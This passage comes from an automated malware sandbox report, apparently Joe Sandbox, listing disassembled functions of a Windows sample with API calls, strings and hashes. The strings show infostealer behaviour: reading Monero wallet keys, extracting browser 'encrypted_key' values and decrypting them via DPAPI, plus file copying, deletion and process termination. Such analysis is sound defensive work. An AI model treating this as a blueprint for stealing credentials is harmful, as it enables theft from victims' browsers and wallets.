                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 425c94e98f34989cb6fa5dcb2541e18359e426f1d3e6d43f4224d81aad0bfd6b
                                    • Instruction ID: 9f2996a3eff2071292ca6a35bda7aed7e3b430539e3f0c33f26756c984eac654
                                    • Opcode Fuzzy Hash: 425c94e98f34989cb6fa5dcb2541e18359e426f1d3e6d43f4224d81aad0bfd6b
                                    • Instruction Fuzzy Hash: B13149B1D01248AEDB15EB91DD82BDEB77CAF48300F408199F21976192DF746B48CF6A
                                    Function 000E87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0E28,00000000,?), ref: 000E882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E8836
                                    • wsprintfA.USER32 ref: 000E8850
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: fc0e0a0c833c36e3b7fe477080f3fc9a899a13b4aa71b1c099bafec79d40abe3
                                    • Instruction ID: b64f1c5313212488213109b43bacbda16d4b8a1d2a826f702cd85d226ace6555
                                    • Opcode Fuzzy Hash: fc0e0a0c833c36e3b7fe477080f3fc9a899a13b4aa71b1c099bafec79d40abe3
                                    • Instruction Fuzzy Hash: 8C2130B1A41608AFDB04DFD8DD45FEEBBB8FB4C711F108119F605A7281C779A9018BA1
                                    Function 000E8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E951E,00000000), ref: 000E8D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E8D62
                                    • wsprintfW.USER32 ref: 000E8D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 63e455d4c552ee0428dbaef0dbec0ac34318d4dfdcc837c1217400f2335150b0
                                    • Instruction ID: aae5e6c5c11025f52163a4fa6b48dbcdecd617e6997a53b69744d20207a53c2d
                                    • Opcode Fuzzy Hash: 63e455d4c552ee0428dbaef0dbec0ac34318d4dfdcc837c1217400f2335150b0
                                    • Instruction Fuzzy Hash: 2FE08CB0A41208BBC700DBD4DC0AEA97BBCEB08702F008194FE0987280DA719E009B92
                                    Function 000DA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DA2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 000DA3FF
                                    • lstrlen.KERNEL32(00000000), ref: 000DA6BC
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DA743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 11f24e7fd62b694f33636288a844fbd7dca432e985ccf8a3810541bb7c6ad3d1
                                    • Instruction ID: b30633eda24b80494e73bf535dae22a315c3eaf17d3f378caaedfc6f6aaf3ba0
                                    • Opcode Fuzzy Hash: 11f24e7fd62b694f33636288a844fbd7dca432e985ccf8a3810541bb7c6ad3d1
                                    • Instruction Fuzzy Hash: 9EE1E772A101489EDB05EBA5DD92EEE7339AF1D300F518169F516B6093EE307A0DCB62
                                    Function 000DD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD481
                                    • lstrlen.KERNEL32(00000000), ref: 000DD698
                                    • lstrlen.KERNEL32(00000000), ref: 000DD6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DD72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: e76359186d6ad6a6ca58370ad7fed486fbb179f95a1f26040ea67c9726f21a2b
                                    • Instruction ID: fea784c7110249e78199974e6b92125f2868761f94c68e1dea4f1bfade878985
                                    • Opcode Fuzzy Hash: e76359186d6ad6a6ca58370ad7fed486fbb179f95a1f26040ea67c9726f21a2b
                                    • Instruction Fuzzy Hash: ED911C72A101489EDB05EBA1DD92EEE7339AF1D300F518169F516B6093EF347A09CB62
                                    Function 000DD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD801
                                    • lstrlen.KERNEL32(00000000), ref: 000DD99F
                                    • lstrlen.KERNEL32(00000000), ref: 000DD9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DDA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 909f4abea9bc5ed8bf3d46392ce319488cab01c0c39857e25710eb69bca87332
                                    • Instruction ID: fe66be1ad797eb0595a10138917235087388d126e6d0711d688322be302a6574
                                    • Opcode Fuzzy Hash: 909f4abea9bc5ed8bf3d46392ce319488cab01c0c39857e25710eb69bca87332
                                    • Instruction Fuzzy Hash: 0D810C72A101489EDB05FBA5DD92EEE7339AF19300F414529F506B6093EF347A09CBA2
                                    Function 000DF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000F1580,000F0D92), ref: 000DF54C
                                    • lstrlen.KERNEL32(00000000), ref: 000DF56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: ed9cdec28f1812845a61eaf22933bb0e4061e67a7f258c1ce7e585a11a5fd93d
                                    • Instruction ID: c7fd225ffbfb38b396f236e1072d1152c48769390dd769b432de13b9871067fd
                                    • Opcode Fuzzy Hash: ed9cdec28f1812845a61eaf22933bb0e4061e67a7f258c1ce7e585a11a5fd93d
                                    • Instruction Fuzzy Hash: 75510D71A00148AEDB04FBA1DD92DED7379AF59300F418529F916B6193EE347A09CBA2
                                    Function 000E3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: fc6b28f4e0fc7da63a9634becdf9d86aa5e46ef8ef2681b70b64f304002c812d
                                    • Instruction ID: bf13f3455ffedfa52adcfe4afe8a4cdd966cebeeb708d6a9dcdfdfbd5f32c41e
                                    • Opcode Fuzzy Hash: fc6b28f4e0fc7da63a9634becdf9d86aa5e46ef8ef2681b70b64f304002c812d
                                    • Instruction Fuzzy Hash: FC414271E14249AFCB04EFB5D845AFEBB74AF48304F04C418E51677251DB75AA09CFA2
                                    Function 000D9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000D9D39
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9AEF
                                      • Part of subcall function 000D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000D4EEE,00000000,?), ref: 000D9B01
                                      • Part of subcall function 000D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9B2A
                                      • Part of subcall function 000D9AC0: LocalFree.KERNEL32(?,?,?,?,000D4EEE,00000000,?), ref: 000D9B3F
                                      • Part of subcall function 000D9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000D9B84
                                      • Part of subcall function 000D9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 000D9BA3
                                      • Part of subcall function 000D9B60: LocalFree.KERNEL32(?), ref: 000D9BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 5ecb2cbcbcca8a8225b485b4c06593436d35c5c54eb6542e69d41b4895047f09
                                    • Instruction ID: 6c48bb35d81687bb2d6783f29840bb3aef83faec83cf0a959fd429ec0048f0b2
                                    • Opcode Fuzzy Hash: 5ecb2cbcbcca8a8225b485b4c06593436d35c5c54eb6542e69d41b4895047f09
                                    • Instruction Fuzzy Hash: 57311EB6D10209ABCB04DFE4DD85AEEB7B9AF48304F144519FA05A7246EB349A14CBB1
                                    Function 000E94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000E94EB
                                      • Part of subcall function 000E8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E951E,00000000), ref: 000E8D5B
                                      • Part of subcall function 000E8D50: RtlAllocateHeap.NTDLL(00000000), ref: 000E8D62
                                      • Part of subcall function 000E8D50: wsprintfW.USER32 ref: 000E8D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 000E95AB
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E95C9
                                    • CloseHandle.KERNEL32(00000000), ref: 000E95D6
                                    Memory Dump Source
